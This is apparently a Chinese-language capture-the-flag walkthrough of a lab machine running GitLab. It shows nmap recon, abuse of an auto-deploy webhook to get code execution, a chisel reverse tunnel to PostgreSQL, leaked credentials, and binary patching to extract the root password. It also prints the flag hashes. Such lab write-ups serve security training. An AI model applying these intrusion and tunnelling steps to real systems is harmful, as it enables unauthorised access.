信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.114 | TCP:22,80 |
$ nmap -p- 10.10.10.114 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open http nginx
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.114/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
GitLab Community Edition
http://10.10.10.114/users/sign_in
$ feroxbuster --url http://10.10.10.114
)
http://10.10.10.114/help/bookmarks.html
www-data
点击Bookmark Link
返回到http://10.10.10.114/users/sign_in 点击书签
页面被自动填充
<?php $input = file_get_contents("php://input"); $payload = json_decode($input); $repo = $payload->project->name ?? ''; $event = $payload->event_type ?? ''; $state = $payload->object_attributes->state ?? ''; $branch = $payload->object_attributes->target_branch ?? ''; if ($repo=='Profile' && $branch=='master' && $event=='merge_request' && $state=='merged') { echo shell_exec('cd ../profile/; sudo git pull'),"\n"; } echo "OK\n";
当一个名为 “Profile” 的项目在 GitLab 中有针对 “master” 分支的合并请求被合并时,自动在服务器上执行 git pull 来更新本地代码库。
这意味着,如果恶意的东西放进仓库,它会自动部署到服务器。
http://10.10.10.114/profile/
http://10.10.10.114/root/profile/blob/master/index.php
仓库profile中,该页面似乎已经部署在当前环境
创建一个新的分支,然后将其合并到master中,因为这将触发更新。
合并到master中
http://10.10.10.114/profile/
显示和操作 Linux 系统中的邻居表(Neighbor Table)
www-data@bitlab:/tmp# ip neigh
www-data@bitlab:/tmp$ nmap 172.19.0.2-5 --min-rate 1000 -sC -sV -open
Nmap scan report for 172.19.0.2
Host is up (0.00025s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
|_http-server-header: nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://172.19.0.2/users/sign_in
Nmap scan report for 172.19.0.4
Host is up (0.00051s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
| Fpostmaster.c
| L2064
|_ RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.60%I=7%D=9/1%Time=66D3C4DF%P=x86_64-pc-linux-gnu%r(SMB
SF:ProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20frontend
SF:\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x203\
SF:.0\0Fpostmaster\.c\0L2064\0RProcessStartupPacket\0\0");
Nmap scan report for 172.19.0.5
Host is up (0.00023s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 22:d5:7c:1f:9b:f3:09:ca:c7:54:de:7c:3f:e7:bd:a4 (RSA)
| 256 b7:66:cd:0d:92:30:30:7c:f9:ba:3a:10:7a:aa:10:af (ECDSA)
|_ 256 95:c3:63:68:2f:d4:d0:a1:3e:19:eb:c7:1c:18:98:02 (EdDSA)
80/tcp open http nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
|_http-server-header: nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://172.19.0.5/users/sign_in
8181/tcp open intermapper?
| fingerprint-strings:
| GenericLines, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Date: Sun, 01 Sep 2024 01:35:27 GMT
| Location: http://127.0.0.1:8080/users/sign_in
| X-Content-Type-Options: nosniff
| X-Frame-Options: DENY
| X-Request-Id: ubpoqM1wyT
| X-Runtime: 0.029878
| X-Ua-Compatible: IE=edge
| X-Xss-Protection: 1; mode=block
| Content-Length: 101
| <html><body>You are being <a href="http://127.0.0.1:8080/users/sign_in">redirected</a>.</body></html>
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Content-Length: 3108
| Content-Type: text/html; charset=utf-8
| Date: Sun, 01 Sep 2024 01:35:27 GMT
| Expires: Fri, 01 Jan 1990 00:00:00 GMT
| Pragma: no-cache
| X-Request-Id: cDi9vgqagK9
| X-Runtime: 0.006752
| <!DOCTYPE html>
| <html>
| <head>
| <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
| <title>The page you're looking for could not be found (404)</title>
| <style>
| body {
| color: #666;
| text-align: center;
| font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
| margin: auto;
| font-size: 14px;
| font-size: 56px;
| line-height: 100px;
| font-weight: 400;
| color: #456;
| font-size: 24px;
| color: #666;
| line-height: 1.5em;
| color: #456;
|_ font-size
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8181-TCP:V=7.60%I=7%D=9/1%Time=66D3C4DF%P=x86_64-pc-linux-gnu%r(Get
SF:Request,1C7,"HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2001\x2
SF:0Sep\x202024\x2001:35:27\x20GMT\r\nLocation:\x20http://127\.0\.0\.1:808
SF:0/users/sign_in\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Option
SF:s:\x20DENY\r\nX-Request-Id:\x20ubpoqM1wyT\r\nX-Runtime:\x200\.029878\r\
SF:nX-Ua-Compatible:\x20IE=edge\r\nX-Xss-Protection:\x201;\x20mode=block\r
SF:\nContent-Length:\x20101\r\n\r\n<html><body>You\x20are\x20being\x20<a\x
SF:20href=\"http://127\.0\.0\.1:8080/users/sign_in\">redirected</a>\.</bod
SF:y></html>")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,D4A,"HTTP/1\
SF:.0\x20404\x20Not\x20Found\r\nCache-Control:\x20no-cache,\x20no-store,\x
SF:20max-age=0,\x20must-revalidate\r\nContent-Length:\x203108\r\nContent-T
SF:ype:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2001\x20Sep\x2020
SF:24\x2001:35:27\x20GMT\r\nExpires:\x20Fri,\x2001\x20Jan\x201990\x2000:00
SF::00\x20GMT\r\nPragma:\x20no-cache\r\nX-Request-Id:\x20cDi9vgqagK9\r\nX-
SF:Runtime:\x200\.006752\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x
SF:20<meta\x20content=\"width=device-width,\x20initial-scale=1,\x20maximum
SF:-scale=1\"\x20name=\"viewport\">\n\x20\x20<title>The\x20page\x20you're\
SF:x20looking\x20for\x20could\x20not\x20be\x20found\x20\(404\)</title>\n\x
SF:20\x20<style>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20color
SF::\x20#666;\n\x20\x20\x20\x20\x20\x20text-align:\x20center;\n\x20\x20\x2
SF:0\x20\x20\x20font-family:\x20\"Helvetica\x20Neue\",\x20Helvetica,\x20Ar
SF:ial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20margin:\x20auto;\n\x20\x20
SF:\x20\x20\x20\x20font-size:\x2014px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\
SF:x20h1\x20{\n\x20\x20\x20\x20\x20\x20font-size:\x2056px;\n\x20\x20\x20\x
SF:20\x20\x20line-height:\x20100px;\n\x20\x20\x20\x20\x20\x20font-weight:\
SF:x20400;\n\x20\x20\x20\x20\x20\x20color:\x20#456;\n\x20\x20\x20\x20}\n\n
SF:\x20\x20\x20\x20h2\x20{\n\x20\x20\x20\x20\x20\x20font-size:\x2024px;\n\
SF:x20\x20\x20\x20\x20\x20color:\x20#666;\n\x20\x20\x20\x20\x20\x20line-he
SF:ight:\x201\.5em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h3\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#456;\n\x20\x20\x20\x20\x20\x20font-size");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
postgresql && 隧道
$ chisel server -p 10000 --reverse
www-data@bitlab:/tmp$ ./chisel client 10.10.16.24:10000 R:5432:localhost:5432
连接之前。我们需要找到用户凭证
http://10.10.10.114/dashboard/snippets
http://10.10.10.114/snippets/1
username:profiles password:profiles
$ psql -h 127.0.0.1 -p 5432 -U profiles
profiles=> \list
profiles=> \dt
username:clave password:c3NoLXN0cjBuZy1wQHNz==
User.txt
17c8588ec3bd9790f0ae64ea8ad71d79
权限提升 && 逆向
$ scp clave@10.10.10.114:~/RemoteConnection.exe .
找到call
Address=00F5165A
Disassembly=call dword ptr ds:[]
Destination=<shell32.ShellExecuteW> (75BDB110)
打断点后执行程序,发现jne指令执行后,跳过了shellexec函数。
在执行的时候我们需要nop掉对比过程
00F51640 | 817D 98 D831F500 | cmp dword ptr ss:[ebp-68],remoteconnect | F531D8:L"clave"
很明显这是做一个对比用户名,但是当前主机名不为clave,所以需要绕过if语句,进入Shellexec函数
进入函数
此时在堆栈中就有root用户的密码了
www-data@bitlab:/srv/docker/gitlab/postgresql$ su root
该exe必须x32gdb动态调试才会显示密码
Root.txt
8bd53c50dabbc99ea10a2803fba16481
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
